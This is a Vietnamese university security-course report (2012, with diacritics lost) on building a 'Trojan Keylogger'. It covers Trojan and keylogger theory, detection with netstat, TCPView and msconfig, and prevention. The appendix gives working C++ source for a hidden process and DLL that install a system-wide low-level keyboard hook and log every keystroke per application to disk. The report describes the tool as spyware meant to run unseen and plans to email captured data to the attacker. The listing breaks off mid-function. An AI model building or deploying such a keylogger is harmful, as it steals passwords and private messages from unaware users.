
TRNG I HC BCH KHOA

KHOA CNG NGH THNG TIN

B MN MNG V TRUYN THNG

AN TON THNG TIN MNG


ti 15:

Xy dng chng trnh


Trojan Keylogger

Gio vin hng dn


Sinh vin thc hin
:
Lp
Nhm

:
:

TS. NGUYN TN KHI


L PHAN SN ANH
NGUYN H HI NG
NG PHAN MINH HI
08T4
12

Nng 2012

Bo Co An Ton Thng Tin Mng

MC LC
MC LC....................................................................................................................2
Chng 1. C S L THUYT.................................................................................3
1.1 Gii thiu................................................................................................................3
1.2 Tm hiu v Trojan.................................................................................................5
1.2.1 Cc dng Trojans c bn:.................................................................................5
1.2.2 Mc ch ca nhng k vit ra nhng Trojans:.................................................5
1.2.3 Nhng con ng my tnh nn nhn nhim Trojan:...................................6
1.2.4 Nhng cch nhn bit mt my tnh b nhim Trojan:......................................6
1.3 Gii thiu v KeyLogger........................................................................................7
1.3.1 KeyLogger l g?..............................................................................................7
1.3.2 Phn loi KeyLogger:.......................................................................................7
1.3.3 Cch hot ng ca KeyLogger:.......................................................................8
1.4 Cch pht hin v phng chng..............................................................................9
1.4.1 Cch pht hin Trojan:......................................................................................9
1.4.2 Cch phng chng:.........................................................................................13
Chng 2. PHN TCH V THIT K CHNG TRNH....................................14
2.1 M t bi ton.......................................................................................................14
2.2 Phn tch yu cu..................................................................................................14
2.2.1 Yu cu v chc nng:....................................................................................14
2.2.2 Yu cu v giao din ngi dng:..................................................................14
2.2.3 Yu cu v tng thch:..................................................................................14
2.3 Phn tch chc nng..............................................................................................14
2.4 K thut Hook.......................................................................................................14
2.4.1 Gii thiu:.......................................................................................................14
2.4.2 Chui Hook:...................................................................................................15
2.4.3 Th tc Hook:.................................................................................................15
2.4.4 Cch s dng Hook:.......................................................................................16
2.5 Thut ton.............................................................................................................17
2.5.1 Hm WriteStringToFile(char *txt):................................................................17
2.5.2 Hm LogKeyboard:........................................................................................17
Chng 3. TRIN KHAI NH GI KT QU....................................................18
3.1 Mi trng trin khai............................................................................................18
3.2 Kt qu chc nng chng trnh...........................................................................18
3.3 u v nhc im.................................................................................................20
3.3.1 u im:.........................................................................................................20
3.3.2 Nhc im:...................................................................................................20
3.4 Hng pht trin...................................................................................................20
20
TI LIU THAM KHO..........................................................................................21
PH LC...................................................................................................................22

SVTH: Sn Anh Hi ng Minh Hi 08T4


2

Bo Co An Ton Thng Tin Mng

Chng 1.
1.1

C S L THUYT

Gii thiu
Mt Trojan l mt chng trnh nh chy ch n v gy hi cho my tnh.
Vi s tr gip ca Trojan, mt k tt cng c th d dng truy cp vo my

tnh ca nn nhn thc hin mt s vic nguy hi nh ly cp d liu, xa file, v


nhiu kh nng khc.

Cng ging nh Nga Thnh Troy trong thn thoi trng c v nh l mt


mn qu, nhng thc ra c cha lnh Hy Lp, bn chng chim thnh Troy. Trojan
l mt chng trnh dng vi rt, mt k lm ni gin trong my tnh ca bn gip
cho tn tin tc (hacker) iu khin my tnh ca bn, Trojan gip tn tin tc ly nhng
thng tin qu bu ca bn, thm ch hn c th xa hoc nh dng li c cng ca
bn na. Trojan c th nhim vo my ca bn qua tp tin gn km th in t m
bn v tnh ti v v chy th, hoc c ln trong nhng chng trnh tr chi,
nhng chng trnh m bn khng r ngun gc
moi rut c mt khu ca cc ch thu bao, hacker ni thng s dng
vi rt c h Trojan (vi rt thnh Troa) gi n cc thu bao cn tn cng thng qua
th in t (e-mail) di dng d liu nh km (File Attachment). Ch cn khi cc
ch thu bao v tnh m file ny, lp tc vi rt Trojan c kch ng v t ng sao
SVTH: Sn Anh Hi ng Minh Hi 08T4
3

Bo Co An Ton Thng Tin Mng

chp li tt c cc thng s v mt khu ca ch thu bao. Khng ch l mt khu truy


cp Internet m ngay c n mt khu ca hm th in t cng d dng b nh cp.
Ngay sau khi ch thu bao kt ni Internet, vi rt Trojan s b mt sinh ra mt e- mail
v gi mt khu nh cp v cho tin tc. V sau mi ln thay i mt khu virus
Trojan s tip tc lng l tun ca n cp ti mt a ch m hacker ni nh sn.
nh la nn nhn, tin tc lun tm cch ging ra nhng loi by ht
sc tinh vi. Tinh vi n ni khng t ch thu bao d rt k tnh nhng vn c sp
by nh thng. Ph bin nht l hacker ni i lt nhng t chc hay cng ty c uy
tn nh la ch thu bao bng chng trnh phn mm th ma Ghostmail. tin
tc d dng tho ra nhng e-mail mo danh vi ni dung: Hin gi tnh trng nh
cp mt khu thu bao ang rt ph bin. Khi nhn c nhng tin kiu nh vy, c
khng t thu bao d dng cn cu v c t nhin cho chy chng trnh vi rt
Trojan m khng h nhn thc c rng h ang t nguyn hin mnh thnh nn
nhn ca bn tin tc
Nh vy, khi Trojan c kch hot trn my ca bn v khi bn truy cp
Internet th Trojan c th ly mt khu truy cp mng, ly danh sch th in t v
thm ch c cu hnh my tnh ca bn gi cho mt a ch th in t ca tn tin
tc. Nhng nguy him hn, Trojan cn gi c a ch mng IP, l a ch m nh cung
cp dch v mng (ISP) gn cho bn lc truy cp; tn tin tc s s dng a ch IP ca
bn thit lp kt ni t my tnh ca hn ti my tnh ca bn qua mng Internet.
Trojan s ly thng tin, xa thng tin
Tc hi ca Trojan:
* Xo hay vit li cc d liu trn my tnh.
* Lm hng chc nng ca cc tp.
* Ly nhim cc phn mm c tnh khc nh l virus.
* Ci t mng my c th b iu khin bi my khc hay dng my nhim
gi th nhng lm.
* c ln cc thng tin cn thit v gi bo co n ni khc.
* n cp thng tin nh l mt khu v s th tn dng.
* c cc chi tit ti khon ngn hng v dng vo cc mc tiu phm ti.
SVTH: Sn Anh Hi ng Minh Hi 08T4
4

Bo Co An Ton Thng Tin Mng

* Ci t ln cc phn mm cha c cho php.


1.2

Tm hiu v Trojan
K tn cng c th truy cp c vo cc my tnh b nhim Trojans khi

chng Online. Sau c th truy cp v iu khin ton b my tnh ca nn nhn, v


chng c kh nng s dng vo nhiu mc ch khc nhau.

1.2.1

Cc dng Trojans c bn:

* Remote Access Trojans Cho k tn cng kim sot ton b h thng t xa.
* Data-Sending Trojans Gi nhng thng tin nhy cm cho k tn cng.
* Destructive Trojans Ph hy h thng.
* Denial-of-Service DoS Attack Trojan: Trojans cho tn cng DoS.
* Proxy Trojans.
* HTTP, FTP Trojans - Trojan t to thnh HTTP hay FTP server k tn
cng khai thc li.
* Security Software Disable Trojan.
1.2.2

Mc ch ca nhng k vit ra nhng Trojans:

* Ly thng tin ca cc ti khon c nhn nh: Email, Password,


* Nhng d liu mt.
* Thng tin ti chnh: Ti khon ngn hng
* S dng my tnh ca nn nhn thc hin mt tc v no , nh tn
cng, scan, hay lm ngp h thng mng ca nn nhn.

SVTH: Sn Anh Hi ng Minh Hi 08T4


5

Bo Co An Ton Thng Tin Mng

1.2.3

Nhng con ng my tnh nn nhn nhim Trojan:

* Qua cc ng dng CHAT online nh IRC Internet Relay Chat.


* Qua cc file c nh km trn Mail
* Qua tng vt l nh trao i d liu qua USB, CD, HDD
* Khi chy mt file b nhim Trojan.
* Qua NetBIOS FileSharing.
* Qua nhng chng trnh nguy him.
* T nhng trang web khng tin tng hay nhng website cung cp phn mm
min ph.
* N c kh nng n trong cc ng dng bnh thng, khi chy ng dng
lp tc cng chy lun Trojans.
1.2.4

Nhng cch nhn bit mt my tnh b nhim Trojan:

* CD-ROM t ng m ra ng vo.
* My tnh c nhng du hiu l trn mn hnh.
* Hnh nn ca cc ca s Windows b thay i
* Cc vn bn t ng in.
* My tinh t ng thay i font ch v cc thit lp khc.
* Hnh nn my tnh t ng thay i v khng th i li.
* Chut tri, chut phi ln ln.
* Chut khng hin th trn mn hnh.
* Nt Start khng hin th.

SVTH: Sn Anh Hi ng Minh Hi 08T4


6

Bo Co An Ton Thng Tin Mng

1.3

Gii thiu v KeyLogger


1.3.1

KeyLogger l g?

Keylogger hay "trnh theo di thao tc bn phm" theo cch dch ra ting
Vit l mt chng trnh my tnh ban u c vit nhm mc ch theo di v ghi
li mi thao tc thc hin trn bn phm vo mt tp tin nht k (log) cho ngi ci
t n s dng. V chc nng mang tnh vi phm vo ring t ca ngi khc ny nn
cc trnh keylogger c xp vo nhm cc phn mm gin ip.
V sau, khi keylogger pht trin cao hn n khng nhng ghi li thao tc bn
phm m cn ghi li c cc hnh nh hin th trn mn hnh (screen) bng cch chp
(screen-shot) hoc quay phim (screen-capture) thm ch cn ghi nhn cch con
tr chut trn my tnh di chuyn.
1.3.2

Phn loi KeyLogger:

Keylogger bao gm hai loi, mt loi keylogger phn cng v mt loi l phn
mm.

Bi vit ny ni n loi phn mm.


Theo nhng ngi lp trnh, keylogger vit ra vi ch c mt loi duy nht l

gip cc bn gim st con ci, ngi thn xem h lm g vi PC, vi internet,


khi chat vi ngi l. Nhng cch s dng v chc nng ca keylogger hin ti trn
th gii khin ngi ta thng hay phn loi keylogger theo mc nguy him bng
cc cu hi:
Nhim vo my khng qua ci t/Ci t vo my cc nhanh (quick install)?
C thuc tnh n/giu trn trnh qun l tin trnh (process manager) v trnh ci
t v g b chng trnh (Add or Remove Program)?
Theo di khng thng bo/PC b nhim kh t pht hin?
C thm chc nng Capturescreen hoc ghi li thao tc chut?
SVTH: Sn Anh Hi ng Minh Hi 08T4
7

Bo Co An Ton Thng Tin Mng

Kh tho g?
C kh nng ly nhim, chng tt (kill process)?
C mi cu tr li "c", cho mt im. im cng cao, keylogger cng vt
khi mc ch gim st (monitoring) n vi mc ch do thm (spying) v tnh nguy
him n cng cao. Keylogger c th c phn loi theo s im:

Loi s 1

Khng im: keylogger loi bnh thng; chy cng khai, c thng bo cho
ngi b theo di, ng vi mc ch gim st.

Loi s 2

Mt n hai im: keylogger nguy him; chy ngm, hng n mc ch do


thm nhiu hn l gim st (nguy hi n cc thng tin c nhn nh l ti khon c
nhn, mt khu, th tn dng v ngi dng khng bit).

Loi s 3

Ba n nm im: keylogger loi rt nguy him; n du hon ton theo di trn


mt phm vi rng, mc ch do thm r rng.

Loi s 4

Su im: keylogger nguy him nghim trng, thng c mang theo bi cc


trojan-virus cc k kh tho g, l loi keylogger nguy him nht. Chnh v vy (v
cng do ng thi l ng bn ca trojan-virus) n thng hay b cc chng trnh
chng virus tm thy v tiu dit.
1.3.3

Cch hot ng ca KeyLogger:

1.3.3.1

Thnh phn ca Keylogger

Thng thng, mt chng trnh keylogger s gm c ba phn chnh:


Chng trnh iu khin (Control Program): dng theo iu phi hot ng,
tinh chnh cc thit lp, xem cc tp tin nht k cho Keylogger. Phn ny l phn
c giu k nht ca keylogger, thng thng ch c th gi ra bng mt t hp
phm tt c bit.
SVTH: Sn Anh Hi ng Minh Hi 08T4
8

Bo Co An Ton Thng Tin Mng

Tp tin hook, hoc l mt chng trnh monitor dng ghi nhn li cc thao
tc bn phm, capture screen (y l phn quan trng nht)
Tp tin nht k (log), ni cha ng/ghi li ton b nhng g hook ghi nhn
c.
Ngoi ra, ty theo loi c th c thm phn chng trnh bo v (guard,
protect), chng trnh thng bo (report)

1.3.3.2

Cch thc ci t vo my

Cc loi keylogger t 1 - 3 thng thng khi ci t vo my cng ging nh


mi chng trnh my tnh khc, u phi qua bc ci t. u tin n s ci t cc
tp tin dng hot ng vo mt th mc c bit (rt phc tp), sau ng k
cch thc hot ng ri i ngi dng thit lp thm cc ng dng. Sau n bt
u hot ng.
Loi keylogger s 4 c th vo thng my ca ngi dng b qua bc ci t,
dng tnh nng autorun cng chy vi h thng. Mt s loi t th (drop) mnh vo
cc chng trnh khc, khi ngi dng s dng cc chng trnh ny keylogger s
t ng chy theo.
1.3.3.3

Cch hot ng

Trong mt h thng (Windows, Linux, Mac), khi bm 1 phm trn bn phm,


bn phm s chuyn n thnh tnh hiu chuyn vo CPU. CPU s chuyn n ti h
iu hnh h iu hnh dch thnh ch hoc s cho chnh n hoc cc chng trnh
khc s dng.
Nhng khi trong h thng c keylogger, khng nhng ch c h iu hnh
theo di m c hook file/monitor program ca keylogger theo di n s ghi nhn v
dch li cc tnh hiu ghi vo tp tin nht k. ng thi n cn c th theo di c mn
hnh v thao tc chut.
1.4 Cch pht hin v phng chng
1.4.1

Cch pht hin Trojan:

C ba nguyn l ca bt k chng trnh Trojan no:


SVTH: Sn Anh Hi ng Minh Hi 08T4
9

Bo Co An Ton Thng Tin Mng

- Mt trojan mun hot ng phi lng nghe cc request trn mt cng no


- Mt chng trnh ang chy s phi c TN trong Process List
- Mt chng trnh Trojan s lun chy cng lc khi my tnh khi ng.
1.4.1.1

Pht hin Port s dng bi Trojans:

- Dng cu lnh Netstat an trong windows bit h thng ang lng nghe
trn cc port no.
+ Hnh di ta thy c port 7777 y l port ca Tini Trojan.
+ Ta thy port 8800 ang ch nghe v c my ang kt ni n, c th
l ca Trojans.

- Dng phn mm Fport


- Dng phn mm TCPView
Ta c th xem ton b cc port ang s dng v chng trnh g ang s dng
port no.
T y ta c th kim tra cc dch v mng vi nhng Port nghi ng ta c th
dng Firewall ng li.

SVTH: Sn Anh Hi ng Minh Hi 08T4


10

Bo Co An Ton Thng Tin Mng

SVTH: Sn Anh Hi ng Minh Hi 08T4


11

Bo Co An Ton Thng Tin Mng

1.4.1.2

Cch pht hin cc chng trnh ang chy:

- Dng phn mm Process Viewer tt c cc Process s c hin th d c


ang chy ch n v khng hin trn Task Manager ca Windows.

SVTH: Sn Anh Hi ng Minh Hi 08T4


12

Bo Co An Ton Thng Tin Mng

1.4.1.3

Tm mt chng trnh chy lc khi ng:

- Trong Startup
- Trong Registry: a s s nm ti y: Chng ta s dng cu lnh Msconfig
trong Table Startup chng trnh no mun chy t ng s phi nm ti y.
Trong v d ny c file nc.exe chy lc khi ng v tr ca n l ti folder
c:\vnexperts.net

1.4.2

Cch phng chng:

- Khng s dng cc phn mm khng tin tng (i khi tin tng vn b dnh
Trojans).
- Khng vo cc trang web nguy him, khng ci cc ActiveX v JavaScript
trn cc trang web bi c th s nh km Trojans.
- Ti quan trng l phi update OS thng xuyn.
- Ci phn mm dit virus uy tn nh: Kaspersky Internet Security, Norton
Internet Security, v Mcafee Total Security. Sau khi ci cc phn mm ny bn hy
update n thng xuyn.

SVTH: Sn Anh Hi ng Minh Hi 08T4


13

Bo Co An Ton Thng Tin Mng

Chng 2.
2.1

PHN TCH V THIT K CHNG TRNH

M t bi ton
Xy dng mt chng trnh Trojan Keylogger c kh nng ghi li cc thao tc

bn phm ca cc chng trnh m ngi dng ang s dng.


2.2

Phn tch yu cu
2.2.1

Yu cu v chc nng:

Chng trnh ghi li ton b thao tc phm ca ngi dng v lu ra mt tp


tin vn bn.
2.2.2

Yu cu v giao din ngi dng:

y l chng trnh mang tnh cht gin ip nn s c chy n trong h


thng v khng c giao din ha, ngi dng ch c th xem qua Task Manager.
2.2.3

Yu cu v tng thch:

m bo c s tng tc tt nht vi window, trong chng trnh ny


chng em s dng ngn ng C++ trn mi trng Dev C++, Visual C++.
2.3

2.4

Phn tch chc nng


-

Phn tch cc tin trnh, ca s ang nhp d liu.

Ghi li ton b thao tc bn phm.

Lu ra cc tp tin vn bn theo ngy thng v tn ng dng.

K thut Hook
2.4.1

Gii thiu:

Hook l mt k thut x l thng ip rt mnh cho php chng ta can thip


su vo cc tin trnh khc nhau, nhng n lm nh hng ti tc ca h thng,
nht l hook system-wide, v tt c cc s kin ca h thng s c nh hng ti
mt hm no , r rng iu ny lm h thng chm i ng k. V th ta ch hn

SVTH: Sn Anh Hi ng Minh Hi 08T4


14

Bo Co An Ton Thng Tin Mng

hook nhng thng ip tht cn thit v kt thc vic hook ngay khi khng dng n
na.
Cc m hnh Hook:
- Local hook: l k thut Hook dng by s kin ngay trong tin trnh ci
t.
- Remote hook: l k thut Hook cho php by cc s kin thuc tin trnh ca
ng dng khc. Trong m hnh ny li tn ti hai kiu hook khc :
+ Thread-specific : kiu Hook ny s by s kin ca mt lung c th.
+ System-wide : by s kin ca tt c cc lung trong tt c cc tin
trnh ang thi hnh trong h thng.
Thnh phn ca Hook:
Chui Hook
Th tc Hook
Cc kiu Hook
2.4.2

Chui Hook:

H thng c kh nng h tr nhiu kiu hook khc nhau, mi kiu li c quy


nh mt cch thc truy nhp khc nhau trong k thut iu khin thng ip. Do vy,
h thng duy tr mt chui cc hook cho mi mt kiu hook khc nhau.
Mt chui hook l mt danh sch cc con tr c bit, n c tr ti cc hm
CallBack gi l hook procedure (th tc hook). Nh vy khi mt s kin xut hin, h
thng s chuyn s kin ti cc th tc hook c tham chiu bi chui hook theo
th t ln lt. V th phi thc hin xong th tc ny mi c gi th tc k tip.
2.4.3

Th tc Hook:

Th tc hook s l ni thc hin cc thao tc sau khi bt c mt s kin


mong mun. Cc th tc hook ph thuc vo cc kiu hook khc nhau m c cu trc,
chc nng khc nhau. C th tc ch c th iu khin thng ip, mt s khc c th
sa i thng ip, dng tin trnh ca thng ip, ngn cn thc hin hook tip theo
hoc a ti ca s cui cng
SVTH: Sn Anh Hi ng Minh Hi 08T4
15

Bo Co An Ton Thng Tin Mng

Th tc hook c dng chung nh sau:


LRESULT CALLBACK HookProc( int nCode, WPARAM wParam,
LPARAM lParam );
Trong :
- HookProc: l tn i din ca th tc hook c ci t
- nCode : y l m hook, n quyt nh ton b hot ng ca th tc hook,
m hook ph thuc vo kiu hook v mi kiu hook c gn cho mt k t thit
lp m hook.
- wParam, lParam: Hai tham s ny cha cc thng tin v thng ip c
hook v n ph thuc vo m hook (nCode).
2.4.4
2.4.4.1

Cch s dng Hook:


Ci t Hook

Ta c th ci t th tc hook vo chui hook bng vic gi hm


SetWindowsHookEx v ch ra kiu hook ang gi th tc, vic ci t hook c th
thc hin trn mi tin trnh trong h thng.
Nu s dng hook ton cc th phi t trong th vin lin kt ng (DLL).
ng dng mun s dng th vin lin kt ng phi ly c handle ca th vin .
nhn Handle ca th vin lin kt ng ta c th s dng hm LoadLibrary vi
tham s l tn ca th vin. Sau khi c c Handle ca DLL, ta s ly a ch ca th
tc hook trong th vin lin kt ng thng qua hm GetProcAddress. Sau khi c
th tc hook, s dng hm SetWindowsHookEx ci t th tc hook vo trong
chui hook.
2.4.4.2

Gii phng Hook

Nh ni th hook nn c b i nu nh khng cn thit na bng cch s


dng hm UnhookWindowsHookEx.
Vi thread-specific hook, vic s dng hm UnhookWindowsHookEx s gii
phng th tc hook. Tuy nhin vi hook ton tc (system-wide hook) th hm ny
khng th tr t do cho hm DLL. Vic gi hm LoadLibrary s gi trong ng cnh
ca tt c cc tin trnh, tuy nhin hm FreeLibrary th khng th thc hin vi cc
SVTH: Sn Anh Hi ng Minh Hi 08T4
16

Bo Co An Ton Thng Tin Mng

tin trnh khc. V vy, khng c cch no gii phng DLL. H thng ch c th
gii phng DLL khi tt c cc tin trnh lin kt ti DLL phi kt thc hoc gi
FreeLibrary.
Gii php t ra cho vn ny l xy dng hm ci t ngay trong th vin
DLL. Bng vic lin kt ti DLL, ng dng c th ci t hook. V ngay trong DLL
cng phi c hm gii phng hook gii phng khi khng cn n na.
2.5

Thut ton
2.5.1

Hm WriteStringToFile(char *txt):

- Gi hm GetLocalTime(&st) ly thi gian ca h thng gn vo st.


- Gi hm GetForegroundWindow() ly a ch ca ca s ang s dng.
- Truyn a ch ca s va tm c vo hm GetWindowThreadProcessId
ly a ch ng dng ang chy vo bin processID.
- M (nu c) hoc to mi (nu cha c) mt file text vi tn l ngy v
tn ng dng ang chy.
sprintf(str,"d:\\key-%d_%d_%d-%s.txt",st.wYear,st.wMonth,st.wDay,
GetExecutor(processID));
out=fopen(str,"a");

- Ghi k t txt vo file va m.


2.5.2

Hm LogKeyboard:

- Khai bo 1 con tr keycode kiu KBDLLHOOKSTRUCT cha thng tin s


kin u vo ca bn phm.
- Nu phm bm l ci phm c bit th gi hm WriteStringToFile ghi
vo file nhng cm t tng ng vi phm .
if (keycode->vkCode == VK_RETURN) WriteStringToFile("{Enter}");
if (keycode->vkCode == VK_BACK) WriteStringToFile("{Backspace}");
if (keycode->vkCode == VK_DELETE) WriteStringToFile("{Delete}");
if (keycode->vkCode == VK_HOME) WriteStringToFile("{Home}");
if (keycode->vkCode == VK_END) WriteStringToFile("{End}");
if (keycode->vkCode == VK_LEFT) WriteStringToFile("{Left}");
if (keycode->vkCode == VK_RIGHT) WriteStringToFile("{Right}");
if (keycode->vkCode == VK_UP) WriteStringToFile("{Up}");
if (keycode->vkCode == VK_DOWN) WriteStringToFile("{Down}");

- Cn li th ghi vo file vi k t tng ng ca phm bm .


SVTH: Sn Anh Hi ng Minh Hi 08T4
17

Bo Co An Ton Thng Tin Mng

Chng 3.
3.1

TRIN KHAI NH GI KT QU

Mi trng trin khai


Phn mm c trin khai chy th trn cc phin bn ca Win7.

3.2

Kt qu chc nng chng trnh


Kt qu khi chy chng trnh.

Hnh 1 Chng trnh Jaam.exe chy ngm

SVTH: Sn Anh Hi ng Minh Hi 08T4


18

Bo Co An Ton Thng Tin Mng

Hnh 2 S dng ng dng Yahoo Messenger

Hnh 3 Kt qu ghi c t chng trnh

Hnh 4 Ni dung mt tp tin log

SVTH: Sn Anh Hi ng Minh Hi 08T4


19

Bo Co An Ton Thng Tin Mng

3.3

u v nhc im
Sau khi trin khai chy th ng dng, nhm chng em rt ra cc nhn xt nh

gi sau:
3.3.1

u im:

- Chng trnh khng lm tng ng k thi gian hin th phm bm.


- Chng trnh ghi li c 100% thao tc phm.
- Cc tp tin ghi li theo ngy v ng dng m ngi s dng g phm thng
tin chnh xc 100%.
3.3.2

Nhc im:

- Vn cn k t l trong bn log. Nguyn nhn l do cc k t Unicode c


tr v t chng trnh Unikey.
- V chng trnh bt tt c thao tc bn phm ca tt c cc ng dng c
chy nn to ra hi nhiu file text d tha.
3.4

Hng pht trin


- To ra file cu hnh cho chng trnh Trojan c v x l bt phm bm

ca cc ng dng m ngi dng quan tm.


- Pht trin Trojan t gi thng tin v mail.

SVTH: Sn Anh Hi ng Minh Hi 08T4


20

Bo Co An Ton Thng Tin Mng

TI LIU THAM KHO

- Website wikipedia.org
- Software Requirement Specification Template IEEE
- An Analysis of the System
Salman A. Baset and Henning Schulzrinne
Department of Computer Science
Columbia University, New York NY 10027
{salman,hgs}@cs.columbia.edu
September 15, 2004

SVTH: Sn Anh Hi ng Minh Hi 08T4


21

Bo Co An Ton Thng Tin Mng

PH LC
Tp tin thi hnh Jaam.exe
#include "stdafx.h"
#include <windows.h>
/* Declare Windows procedure. Note: WinMain never registers a window class or
   creates a window, so as listed this procedure is never dispatched to. */
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
/* Make the class name into a global variable (not referenced by any code in
   this listing). */
char szClassName[ ] = "WindowsApp";
/* Module handle of the hook DLL ("Hooker") loaded in WinMain. */
HINSTANCE hinstDLL;
/* Handle returned by SetWindowsHookEx; cleared again in WindowProcedure. */
HHOOK hHook = NULL;
/* Signature of the DLL's SetGlobalHook export: hands the hook handle to the DLL. */
typedef VOID (*LOADPROC)(HHOOK hHook);
/*
 * Entry point of Jaam.exe.
 *
 * Loads the hook DLL by name ("Hooker"), resolves its LogKeyboard export,
 * installs it as a system-wide low-level keyboard hook, passes the hook handle
 * back to the DLL, and then pumps messages until WM_QUIT. No window class is
 * registered and no window is created, so hwnd is never used and
 * WindowProcedure is never reached; the hook is only released when the
 * process ends.
 *
 * From a defender's view the observable footprint is: a process holding a
 * WH_KEYBOARD_LL hook, a loaded module named Hooker, and no visible window.
 */
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
/* The DLL is located by name only, i.e. via the normal DLL search order. */
hinstDLL = LoadLibrary(TEXT("Hooker"));
if (hinstDLL == NULL) { MessageBox(0,L"Not found.",L"Error",0); return 0; }
HOOKPROC hpr = (HOOKPROC)GetProcAddress(hinstDLL,"LogKeyboard");
if (hpr == NULL) { MessageBox(0,L"Unvail lib.",L"Error",0); return 0; }
/* WH_KEYBOARD_LL with thread id 0 = all threads on the desktop. A low-level
   hook is called on this (installing) thread; the DLL is not injected into
   other processes. */
hHook = SetWindowsHookEx(WH_KEYBOARD_LL, hpr, hinstDLL, 0);
if (hHook == NULL) { MessageBox(0,L"Corrupt lib.",L"Error",0); return 0; }
/* The DLL needs the handle for CallNextHookEx; its SetGlobalHook export
   stores it. Unlike the lookups above, this GetProcAddress result is not
   checked for NULL before the call. */
LOADPROC lpr = (LOADPROC)GetProcAddress(hinstDLL,"SetGlobalHook");
lpr(hHook);
/* This would be the handle for our window; it is declared but never set or used */
HWND hwnd;
/* Here messages to the application are saved */
MSG messages;
/* Run the message loop. It will run until GetMessage() returns 0. The loop is
   what keeps the hook alive: a low-level hook requires the installing thread
   to keep pumping messages. */
while (GetMessage (&messages, NULL, 0, 0))
{
/* Translate virtual-key messages into character messages */
TranslateMessage(&messages);
/* Would route window messages to the window procedure; there is no window here */
DispatchMessage(&messages);
}
/* The program return-value is 0 - The value that PostQuitMessage() gave */
return messages.wParam;
}
/* This function is called by the Windows function DispatchMessage() -- in
   principle. WinMain never registers szClassName nor creates a window, so as
   listed nothing dispatches to this procedure and the hook removal in
   WM_DESTROY never runs. Its closing brace is also missing from the listing
   (extraction artifact). */
LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam,
LPARAM lParam)
{
switch (message)
/* handle the messages */
{
case WM_DESTROY:

/* --- the next three lines are the PDF's running page footer/header, not source --- */
SVTH: Sn Anh Hi ng Minh Hi 08T4


22

Bo Co An Ton Thng Tin Mng


PostQuitMessage (0);
/* send a WM_QUIT to the message queue */
/* The only place in the program where the hook is explicitly uninstalled. */
UnhookWindowsHookEx(hHook);
hHook=NULL;
break;
default:
/* for messages that we don't deal with */
return DefWindowProc (hwnd, message, wParam, lParam);

}
return 0;

Th vin Hooker.dll
// dllmain.cpp : Defines the entry point for the DLL application.
#include <windows.h>
#include <conio.h>
#include <stdio.h>
#include <ctype.h>
#include <string>
#include <tchar.h>
#include <stdio.h>
#include <psapi.h>
// ".SHARDAT" is intended as a data section shared by every process that maps
// this DLL (presumably paired with a /SECTION:.SHARDAT,RWS linker option,
// which is not shown). Because Jaam.exe installs a WH_KEYBOARD_LL hook, the
// DLL is not loaded into other processes, so the sharing is unused here.
#pragma data_seg(".SHARDAT")
// Hook handle handed over by Jaam.exe through SetGlobalHook; used by CallNextHookEx.
HHOOK hGlobalHook = NULL;
// Log file stream; opened and closed again on every call to WriteStringToFile.
FILE *out;
#pragma data_seg()
// Declared but never defined or called anywhere in this listing.
int PrintModules( DWORD processID );
void WriteStringToFile(char *txt);
// Declared but never defined or called anywhere in this listing.
void WriteEnterToFile();
// Low-level keyboard hook procedure exported to Jaam.exe.
//
// On every key-down event it appends a textual representation of the key to
// the per-application log through WriteStringToFile, then forwards the event
// with CallNextHookEx. nCode/wParam/lParam are the standard WH_KEYBOARD_LL
// parameters; lParam points at a KBDLLHOOKSTRUCT. Only HC_ACTION with
// WM_KEYDOWN is handled, so key-up and WM_SYSKEYDOWN events pass through
// unlogged.
//
// The body of this function is interrupted by a PDF page break in the listing
// (see the marked lines below).
LRESULT CALLBACK LogKeyboard(int nCode, WPARAM wParam, LPARAM lParam)
{
if (nCode == HC_ACTION && wParam == WM_KEYDOWN)
{
// Bit 0x80 of GetKeyState = key is currently down. For Caps Lock any
// non-zero value is treated as "on" (this also picks up the toggle bit).
bool isDownShift = ((GetKeyState(VK_SHIFT) & 0x80) == 0x80 ? true : false);
bool isDownCapslock = (GetKeyState(VK_CAPITAL) != 0 ? true : false);
bool isDownCtrl = ((GetKeyState(VK_CONTROL) & 0x80) == 0x80 ? true : false);
byte keyState[256];
GetKeyboardState(keyState);  // return value not checked
WORD w;
KBDLLHOOKSTRUCT* keycode = (KBDLLHOOKSTRUCT*)lParam;
// Named tokens for editing/navigation keys. Only the VK_DOWN test carries
// an else: for VK_RETURN, VK_BACK, VK_DELETE, ... the token is written AND
// the ToAscii branch below still executes, so a log line may contain e.g.
// "{Enter}" followed by whatever ToAscii yields for that key (presumably one
// source of the "stray characters" the report mentions).
if (keycode->vkCode == VK_RETURN) WriteStringToFile("{Enter}");
if (keycode->vkCode == VK_BACK) WriteStringToFile("{Backspace}");
if (keycode->vkCode == VK_DELETE) WriteStringToFile("{Delete}");
if (keycode->vkCode == VK_HOME) WriteStringToFile("{Home}");
if (keycode->vkCode == VK_END) WriteStringToFile("{End}");
if (keycode->vkCode == VK_LEFT) WriteStringToFile("{Left}");
if (keycode->vkCode == VK_RIGHT) WriteStringToFile("{Right}");
if (keycode->vkCode == VK_UP) WriteStringToFile("{Up}");
if (keycode->vkCode == VK_DOWN) WriteStringToFile("{Down}");
// Translate the virtual key to a character with the captured keyboard
// state; a return value of 1 means exactly one character was produced.
else if (ToAscii(keycode->vkCode,
keycode->scanCode,
keyState,
&w,
keycode->flags) == 1)
{
char key = (char)w;

// --- the next three lines are the PDF's running page footer/header, not source ---
SVTH: Sn Anh Hi ng Minh Hi 08T4


23

Bo Co An Ton Thng Tin Mng


// Caps Lock XOR Shift upper-cases ASCII letters (65-90 / 97-122 = A-Z / a-z).
if ((isDownCapslock ^ isDownShift) && ((key >= 65 && key <= 90) || (key >= 97 &&
key <= 122 )))
{
key = toupper(key);
}
if (isDownCtrl) {
char str[100];
// With Ctrl held, the raw virtual-key code is printed as a character
// (for letters the VK code equals the upper-case ASCII code), e.g. "{Ctrl - C}".
sprintf(str,"{Ctrl - %c}",(char)keycode->vkCode);
WriteStringToFile(str);}
else {
char str[100];
sprintf(str,"%c",key);
WriteStringToFile(str);}
}
}
// Always forward the event so other hooks and the target application still see it.
return CallNextHookEx( hGlobalHook, nCode, wParam, lParam );
}
// Exported to Jaam.exe: stores the handle returned by SetWindowsHookEx so
// that LogKeyboard can pass it to CallNextHookEx.
void SetGlobalHook(HHOOK hHook)
{
hGlobalHook = hHook;
}
// Returns the base name of the main module (the .exe) of processID; used by
